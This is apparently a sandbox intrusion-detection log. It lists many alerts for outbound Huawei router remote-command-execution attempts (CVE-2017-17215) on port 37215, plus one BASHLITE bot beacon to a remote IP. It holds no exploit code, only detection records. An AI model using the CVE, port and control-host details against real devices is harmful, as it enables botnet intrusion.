                                                        06/13/24-21:32:05.349021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4880837215192.168.2.14197.192.58.164
                                                        06/13/24-21:32:11.508004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5298237215192.168.2.1441.41.204.237
                                                        06/13/24-21:32:58.824194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4824637215192.168.2.1441.84.75.40
                                                        06/13/24-21:33:00.868044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586437215192.168.2.14197.184.5.147
                                                        06/13/24-21:32:28.048284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775237215192.168.2.14197.163.234.29
                                                        06/13/24-21:32:32.155229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038037215192.168.2.14156.71.77.203
                                                        06/13/24-21:33:07.057823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869237215192.168.2.14156.120.66.4
                                                        06/13/24-21:31:57.092941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5419437215192.168.2.1441.127.210.27
                                                        06/13/24-21:32:17.672199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3589437215192.168.2.1441.184.169.224
                                                        06/13/24-21:32:01.241735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5147637215192.168.2.1441.210.222.247
                                                        06/13/24-21:32:07.401261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733837215192.168.2.1441.15.247.59
                                                        06/13/24-21:32:13.543929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680237215192.168.2.14197.28.128.43
                                                        06/13/24-21:32:11.487013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5400837215192.168.2.14156.55.70.199
                                                        06/13/24-21:32:23.936231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3558237215192.168.2.1441.172.215.183
                                                        06/13/24-21:33:02.936631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4745237215192.168.2.1441.129.245.166
                                                        06/13/24-21:32:40.379815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5123237215192.168.2.14197.205.181.62
                                                        06/13/24-21:32:32.168777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5151637215192.168.2.14156.234.1.191
                                                        06/13/24-21:33:17.309441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203437215192.168.2.14197.149.43.83
                                                        06/13/24-21:32:21.799895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031637215192.168.2.14156.108.33.118
                                                        06/13/24-21:31:59.176733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4523637215192.168.2.14156.64.133.141
                                                        06/13/24-21:32:09.440800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4297437215192.168.2.14197.22.160.48
                                                        06/13/24-21:33:05.011931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5729237215192.168.2.1441.228.24.150
                                                        06/13/24-21:32:34.190991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198637215192.168.2.14197.182.159.84
                                                        06/13/24-21:33:13.212320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3305237215192.168.2.1441.52.52.44
                                                        06/13/24-21:32:13.545128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5539837215192.168.2.14197.179.146.193
                                                        06/13/24-21:33:00.889504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895037215192.168.2.14156.230.102.29
                                                        06/13/24-21:32:36.244567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3431637215192.168.2.14197.235.225.58
                                                        06/13/24-21:32:50.614131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3629637215192.168.2.14197.232.171.145
                                                        06/13/24-21:31:57.092637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3479837215192.168.2.14156.34.3.191
                                                        06/13/24-21:33:07.041992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558437215192.168.2.1441.14.46.230
                                                        06/13/24-21:32:32.169141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3632837215192.168.2.14197.39.227.56
                                                        06/13/24-21:33:11.158078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6079837215192.168.2.14197.94.173.113
                                                        06/13/24-21:32:23.943518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965437215192.168.2.14197.127.214.189
                                                        06/13/24-21:32:09.438285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440837215192.168.2.14197.129.97.128
                                                        06/13/24-21:32:46.508672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559637215192.168.2.14156.17.103.187
                                                        06/13/24-21:32:50.630060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5572437215192.168.2.14197.68.164.152
                                                        06/13/24-21:32:32.150745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488637215192.168.2.14156.47.179.68
                                                        06/13/24-21:33:00.889765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5907437215192.168.2.14156.79.64.16
                                                        06/13/24-21:32:21.782311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121037215192.168.2.14156.210.128.180
                                                        06/13/24-21:32:40.376911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639037215192.168.2.14197.4.141.205
                                                        06/13/24-21:32:13.544714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024637215192.168.2.14156.20.128.149
                                                        06/13/24-21:33:15.276612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804637215192.168.2.1441.16.217.182
                                                        06/13/24-21:32:28.024422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674437215192.168.2.14156.112.47.78
                                                        06/13/24-21:33:04.989529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5683437215192.168.2.14197.109.54.171
                                                        06/13/24-21:33:13.212245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4995637215192.168.2.14156.88.180.153
                                                        06/13/24-21:32:25.977275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3799837215192.168.2.14197.99.155.7
                                                        06/13/24-21:33:15.270851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191237215192.168.2.1441.102.190.255
                                                        06/13/24-21:32:48.573054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4742237215192.168.2.14197.114.160.102
                                                        06/13/24-21:33:07.061068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4075437215192.168.2.1441.236.11.196
                                                        06/13/24-21:32:19.731506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938637215192.168.2.14197.166.23.178
                                                        06/13/24-21:32:21.803811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5888837215192.168.2.14197.234.42.210
                                                        06/13/24-21:32:36.246086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506037215192.168.2.1441.49.107.217
                                                        06/13/24-21:32:30.126859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992837215192.168.2.14197.81.159.61
                                                        06/13/24-21:32:34.192732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3876037215192.168.2.1441.9.165.167
                                                        06/13/24-21:32:01.247026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319037215192.168.2.14197.217.216.126
                                                        06/13/24-21:32:09.438654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447237215192.168.2.1441.226.82.82
                                                        06/13/24-21:32:30.124452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5246637215192.168.2.1441.85.31.4
                                                        06/13/24-21:32:50.631380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3770637215192.168.2.1441.29.1.73
                                                        06/13/24-21:32:56.754451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080037215192.168.2.14197.216.235.159
                                                        06/13/24-21:32:58.821735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5254237215192.168.2.14197.181.110.215
                                                        06/13/24-21:32:32.166423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4438437215192.168.2.14197.151.26.37
                                                        06/13/24-21:32:23.940658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5449037215192.168.2.14197.234.246.254
                                                        06/13/24-21:33:09.127306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4431637215192.168.2.1441.173.5.248
                                                        06/13/24-21:32:25.993129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606037215192.168.2.14156.121.152.34
                                                        06/13/24-21:32:32.152605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4276037215192.168.2.14156.12.163.162
                                                        06/13/24-21:33:02.911471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5577237215192.168.2.14156.135.148.41
                                                        06/13/24-21:32:52.656407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304437215192.168.2.14156.22.183.194
                                                        06/13/24-21:32:09.457630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3329037215192.168.2.1441.123.225.152
                                                        06/13/24-21:31:57.090544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5661237215192.168.2.14197.33.124.181
                                                        06/13/24-21:32:44.455133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4561437215192.168.2.14197.127.236.234
                                                        06/13/24-21:32:15.607571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4828637215192.168.2.1441.127.190.17
                                                        06/13/24-21:33:11.160705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5423237215192.168.2.1441.240.127.52
                                                        06/13/24-21:32:07.402477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941437215192.168.2.14156.26.77.175
                                                        06/13/24-21:32:13.547119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4416837215192.168.2.1441.20.28.107
                                                        06/13/24-21:33:17.339640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4094637215192.168.2.1441.110.152.103
                                                        06/13/24-21:32:36.263033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447637215192.168.2.14197.116.153.190
                                                        06/13/24-21:32:13.567166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713837215192.168.2.14197.57.43.74
                                                        06/13/24-21:32:23.832919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534437215192.168.2.14156.249.166.119
                                                        06/13/24-21:31:57.132791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3955837215192.168.2.14197.21.125.189
                                                        06/13/24-21:32:58.821247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5482037215192.168.2.14156.122.131.115
                                                        06/13/24-21:33:17.305301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5167237215192.168.2.1441.207.24.252
                                                        06/13/24-21:32:11.505366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740837215192.168.2.14156.142.198.164
                                                        06/13/24-21:32:09.457242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534637215192.168.2.14197.167.177.124
                                                        06/13/24-21:31:57.092180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4521637215192.168.2.14156.177.28.10
                                                        06/13/24-21:32:21.786152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690437215192.168.2.14156.156.132.43
                                                        06/13/24-21:32:56.792246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4259437215192.168.2.1441.55.101.122
                                                        06/13/24-21:32:13.569356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957237215192.168.2.14197.47.175.37
                                                        06/13/24-21:31:57.129992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5624637215192.168.2.14156.221.191.162
                                                        06/13/24-21:32:17.676745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211437215192.168.2.14156.168.136.69
                                                        06/13/24-21:32:36.246053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184637215192.168.2.14156.238.188.223
                                                        06/13/24-21:31:57.091555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073437215192.168.2.1441.179.176.65
                                                        06/13/24-21:33:17.305791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291237215192.168.2.14156.167.29.204
                                                        06/13/24-21:32:05.343972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4980837215192.168.2.1441.188.99.164
                                                        06/13/24-21:32:09.457973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5758837215192.168.2.1441.165.136.96
                                                        06/13/24-21:32:17.697080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930437215192.168.2.1441.177.236.128
                                                        06/13/24-21:31:57.130208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4780637215192.168.2.14156.153.229.114
                                                        06/13/24-21:32:19.749130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5929237215192.168.2.14197.83.56.81
                                                        06/13/24-21:32:48.552681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5579237215192.168.2.14197.27.233.187
                                                        06/13/24-21:32:50.610466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860637215192.168.2.14156.99.144.210
                                                        06/13/24-21:32:11.489078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3778237215192.168.2.1441.43.28.22
                                                        06/13/24-21:33:09.087409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475237215192.168.2.14156.161.91.229
                                                        06/13/24-21:32:07.402875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5885237215192.168.2.14156.13.221.230
                                                        06/13/24-21:33:13.232108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479837215192.168.2.14156.126.89.41
                                                        06/13/24-21:32:19.751332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3791037215192.168.2.1441.142.23.178
                                                        06/13/24-21:32:11.487592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284637215192.168.2.14197.2.207.165
                                                        06/13/24-21:32:58.823321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3683837215192.168.2.14156.60.8.145
                                                        06/13/24-21:32:34.216179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5385837215192.168.2.14197.86.47.201
                                                        06/13/24-21:32:44.451151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3969837215192.168.2.1441.18.45.91
                                                        06/13/24-21:32:40.375145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899637215192.168.2.14156.80.2.172
                                                        06/13/24-21:32:30.074189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969037215192.168.2.14156.196.99.165
                                                        06/13/24-21:32:03.306176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274437215192.168.2.14156.40.117.185
                                                        06/13/24-21:32:32.164941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389837215192.168.2.14156.13.83.126
                                                        06/13/24-21:31:57.129916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433837215192.168.2.14156.70.243.82
                                                        06/13/24-21:32:36.264526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3982037215192.168.2.14197.74.6.212
                                                        06/13/24-21:32:48.573332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625237215192.168.2.14156.134.1.104
                                                        06/13/24-21:32:40.376723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5724837215192.168.2.14197.22.95.105
                                                        06/13/24-21:32:15.633867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5726437215192.168.2.14156.250.250.211
                                                        06/13/24-21:32:48.568874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844437215192.168.2.14197.171.198.96
                                                        06/13/24-21:32:58.843829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899437215192.168.2.1441.143.38.247
                                                        06/13/24-21:33:17.307263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548237215192.168.2.14197.68.215.74
                                                        06/13/24-21:32:23.835550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304637215192.168.2.1441.185.127.113
                                                        06/13/24-21:32:32.169062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491037215192.168.2.14156.136.55.213
                                                        06/13/24-21:32:59.769102TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)411104554192.168.2.14103.82.38.94
                                                        06/13/24-21:32:23.943648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713437215192.168.2.14197.179.191.240
                                                        06/13/24-21:32:01.247715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3463637215192.168.2.14156.208.54.232
                                                        06/13/24-21:33:11.158199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4662837215192.168.2.14197.181.94.121
                                                        06/13/24-21:32:09.437572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4415437215192.168.2.14156.234.195.39
                                                        06/13/24-21:32:52.658070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214437215192.168.2.14197.154.206.255
                                                        06/13/24-21:33:07.055350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871237215192.168.2.14197.80.22.149
                                                        06/13/24-21:32:17.695295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940437215192.168.2.14156.138.62.54
                                                        06/13/24-21:32:30.123827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3692637215192.168.2.14197.185.87.9
                                                        06/13/24-21:32:05.349499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869037215192.168.2.1441.76.106.103
                                                        06/13/24-21:32:46.502702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295637215192.168.2.1441.73.124.184
                                                        06/13/24-21:32:05.376865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4884237215192.168.2.14156.33.16.212
                                                        06/13/24-21:33:11.180335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431437215192.168.2.14156.157.51.12
                                                        06/13/24-21:32:36.248529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5143037215192.168.2.14156.87.230.170
                                                        06/13/24-21:32:03.276375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3380437215192.168.2.14156.236.184.245
                                                        06/13/24-21:33:02.908940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5135837215192.168.2.14197.216.14.19
                                                        06/13/24-21:32:21.800818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4795437215192.168.2.1441.133.189.173
                                                        06/13/24-21:32:42.406268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650837215192.168.2.14156.36.223.255
                                                        06/13/24-21:33:11.160785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5292637215192.168.2.14156.221.212.6
                                                        06/13/24-21:32:15.630975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3908637215192.168.2.1441.181.4.235
                                                        06/13/24-21:32:28.027709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291237215192.168.2.14156.215.23.133
                                                        06/13/24-21:32:50.615164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739237215192.168.2.14197.0.227.139
                                                        06/13/24-21:32:44.455031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570437215192.168.2.14197.26.30.175
                                                        06/13/24-21:33:07.041625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201837215192.168.2.14197.177.117.71
                                                        06/13/24-21:33:05.012300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995637215192.168.2.14156.253.249.157
                                                        06/13/24-21:32:09.438550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975837215192.168.2.14156.209.145.232
                                                        06/13/24-21:32:32.166681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4088237215192.168.2.1441.39.15.251
                                                        06/13/24-21:32:36.245472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3826837215192.168.2.14156.128.196.74
                                                        06/13/24-21:32:30.124854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751837215192.168.2.14197.63.222.134
                                                        06/13/24-21:32:23.833937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287637215192.168.2.14156.85.44.84
                                                        06/13/24-21:31:57.090061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3522637215192.168.2.14197.117.40.241
                                                        06/13/24-21:32:03.279880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5129237215192.168.2.1441.3.16.29
                                                        06/13/24-21:32:03.300154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5780837215192.168.2.1441.90.188.92
                                                        06/13/24-21:32:23.835237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4728837215192.168.2.14156.15.106.134
                                                        06/13/24-21:32:11.486335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794037215192.168.2.14156.116.69.173
                                                        06/13/24-21:32:52.678918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5617237215192.168.2.14197.88.32.136
                                                        06/13/24-21:32:36.265866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398037215192.168.2.1441.184.58.43
                                                        06/13/24-21:32:23.833263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081237215192.168.2.14156.230.9.78
                                                        06/13/24-21:32:28.043236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4170037215192.168.2.1441.167.12.179
                                                        06/13/24-21:32:36.267003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3342237215192.168.2.1441.0.250.189
                                                        06/13/24-21:32:30.076276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890237215192.168.2.14156.90.10.146
                                                        06/13/24-21:32:09.455958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4368437215192.168.2.14197.188.136.155
                                                        06/13/24-21:33:07.040883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6099437215192.168.2.1441.252.135.162
                                                        06/13/24-21:32:56.791460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940437215192.168.2.14156.80.115.200
                                                        06/13/24-21:33:11.158344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5013437215192.168.2.14156.215.206.195
                                                        06/13/24-21:32:38.302937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5621837215192.168.2.1441.72.21.205
                                                        06/13/24-21:32:23.941998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4076637215192.168.2.14197.81.248.15
                                                        06/13/24-21:33:15.259361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887837215192.168.2.1441.176.182.113
                                                        06/13/24-21:32:23.942228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966437215192.168.2.14156.97.20.251
                                                        06/13/24-21:33:13.231221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492037215192.168.2.14197.161.252.53
                                                        06/13/24-21:32:23.833124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584637215192.168.2.14156.99.74.250
                                                        06/13/24-21:32:40.376466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913437215192.168.2.1441.1.63.96
                                                        06/13/24-21:32:07.404393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025837215192.168.2.1441.162.147.142
                                                        06/13/24-21:32:44.475411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4311437215192.168.2.1441.199.94.128
                                                        06/13/24-21:33:09.089524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4402837215192.168.2.14156.187.210.104
                                                        06/13/24-21:33:04.989146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419637215192.168.2.14156.176.138.91
                                                        06/13/24-21:31:57.154148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689437215192.168.2.14197.71.57.52
                                                        06/13/24-21:32:05.344363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797437215192.168.2.1441.124.255.85
                                                        06/13/24-21:32:19.731117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135837215192.168.2.14156.196.33.24
                                                        06/13/24-21:33:00.868131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556237215192.168.2.1441.6.14.73
                                                        06/13/24-21:33:07.041316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550637215192.168.2.14156.129.134.231
                                                        06/13/24-21:32:21.785545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683637215192.168.2.14197.231.241.157
                                                        06/13/24-21:32:46.510357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030237215192.168.2.1441.11.160.198
                                                        06/13/24-21:33:04.993231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913037215192.168.2.14197.22.51.80
